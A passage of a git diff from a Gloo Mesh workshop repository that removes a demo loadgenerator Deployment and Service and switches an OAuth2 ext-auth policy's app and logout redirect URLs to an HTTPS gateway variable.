"true" - spec: - serviceAccountName: loadgenerator - terminationGracePeriodSeconds: 5 - restartPolicy: Always - containers: - - name: main - image: gcr.io/google-samples/microservices-demo/loadgenerator:v0.3.5 - env: - - name: FRONTEND_ADDR - value: "frontend.web-ui.svc.cluster.local:80" - - name: USERS - value: "2" - resources: - requests: - cpu: 300m - memory: 256Mi ---- - -apiVersion: v1 -kind: Service -metadata: - name: loadgenerator - namespace: web-ui - labels: - app: loadgenerator -spec: - type: ClusterIP - selector: - app: loadgenerator - ports: - - name: http - port: 80 - targetPort: 8080 \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml b/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml index d7b8616..69377f1 100644 --- a/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml +++ b/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml @@ -17,7 +17,7 @@ spec: configs: - oauth2: oidcAuthorizationCode: - appUrl: https://${GLOO_GATEWAY} + appUrl: https://${GLOO_GATEWAY_HTTPS} callbackPath: /callback clientId: ${KEYCLOAK_CLIENTID} clientSecretRef: @@ -25,7 +25,7 @@ spec: namespace: gloo-mesh issuerUrl: "${KEYCLOAK_URL}/realms/master/" logoutPath: /logout - afterLogoutUrl: "${KEYCLOAK_URL}/realms/master/protocol/openid-connect/logout?redirect_uri=https://${GLOO_GATEWAY}" + afterLogoutUrl: "${KEYCLOAK_URL}/realms/master/protocol/openid-connect/logout?redirect_uri=https://${GLOO_GATEWAY_HTTPS}" scopes: - email headers: